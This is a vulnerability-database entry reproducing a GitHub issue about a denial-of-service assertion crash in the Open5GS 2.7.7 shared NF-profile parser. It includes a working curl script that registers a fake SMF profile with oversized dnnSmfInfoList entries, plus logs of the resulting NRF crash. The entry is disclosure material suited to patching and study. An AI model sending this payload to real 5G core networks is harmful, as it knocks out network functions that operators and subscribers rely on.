| Titel | Open5GS NRF、AMF、AUSF、BSF、NSSF、PCF、SMF、UDM、UDR v2.7.7 Denial of Service |
|---|
| Beschreibung | ### Open5GS Release, Revision, or Tag
v2.7.7
### Steps to reproduce
### Description
Open5GS uses a shared NF-profile parser in `lib/sbi/nnrf-handler.c` across
multiple network functions. When
`NFProfile.smfInfo.sNssaiSmfInfoList[*].dnnSmfInfoList` contains more DNN
entries than the internal fixed-size budget, the parser hits:
```c
int dnn_index = nf_info->smf.slice[nf_info->smf.num_of_slice].num_of_dnn;
ogs_assert(dnn_index < OGS_MAX_NUM_OF_DNN);
```
at `../lib/sbi/nnrf-handler.c:434` (around `431-434` depending on build).
This is a shared parser bug, not an NRF-only bug(NRF、AMF、AUSF、BSF、NSSF、PCF、SMF、UDM、UDR). A direct reproduction is
shown below against NRF because it is the shortest setup, but the same handler
is also reachable from other NF-profile parsing paths such as `nf-status-notify`
and discovery responses consumed by other Open5GS network functions.
### Root cause
- Crash site: `../lib/sbi/nnrf-handler.c:434`
- Bug class: attacker-controlled list length reaches a fixed DNN array
- Controlling field: `NFProfile.smfInfo.sNssaiSmfInfoList[*].dnnSmfInfoList`
### Steps to reproduce
```bash
NRF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' nrf)
payload=$(cat <<'EOF'
{"nfInstanceId":"fake-smf-nrf","nfType":"SMF","nfStatus":"REGISTERED","smfInfo":{"sNssaiSmfInfoList":[{"sNssai":{"sst":1,"sd":"000001"},"dnnSmfInfoList":[{"dnn":"d0"},{"dnn":"d1"},{"dnn":"d2"},{"dnn":"d3"},{"dnn":"d4"},{"dnn":"d5"},{"dnn":"d6"},{"dnn":"d7"},{"dnn":"d8"},{"dnn":"d9"},{"dnn":"d10"},{"dnn":"d11"},{"dnn":"d12"},{"dnn":"d13"},{"dnn":"d14"},{"dnn":"d15"},{"dnn":"d16"}]}]}}
EOF
)
curl --http2-prior-knowledge -m 5 -sS -i \
-X PUT "http://$NRF_IP/nnrf-nfm/v1/nf-instances/fake-smf-nrf" \
-H 'content-type: application/json' \
--data "$payload"
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nrf
docker logs --tail 20 nrf
```
### Logs
```shell
curl: (56) Recv failure: Connection reset by peer
exited 139 2026-04-10T17:15:39.389225406Z
04/10 17:15:39.302: [sbi] FATAL: handle_smf_info: Assertion `dnn_index < OGS_MAX_NUM_OF_DNN' failed. (../lib/sbi/nnrf-handler.c:434)
```
### Expected behaviour
Open5GS should reject or cap oversized `dnnSmfInfoList` input before indexing the fixed DNN array, and it should never abort the whole process on peer-controlled NF-profile data.
### Observed Behaviour
The request terminates the HTTP/2 stream and crashes the process with exit code `139`.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| Quelle | ⚠️ https://github.com/open5gs/open5gs/issues/4469 |
|---|
| Benutzer | ZiyuLin (UID 93568) |
|---|
| Einreichung | 04.05.2026 04:56 (vor 1 Monat) |
|---|
| Moderieren | 29.05.2026 19:15 (26 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 367293 [Open5GS bis 2.7.7 Shared NF-profile Parser lib/sbi/nnrf-handler.c Denial of Service] |
|---|
| Punkte | 20 |
|---|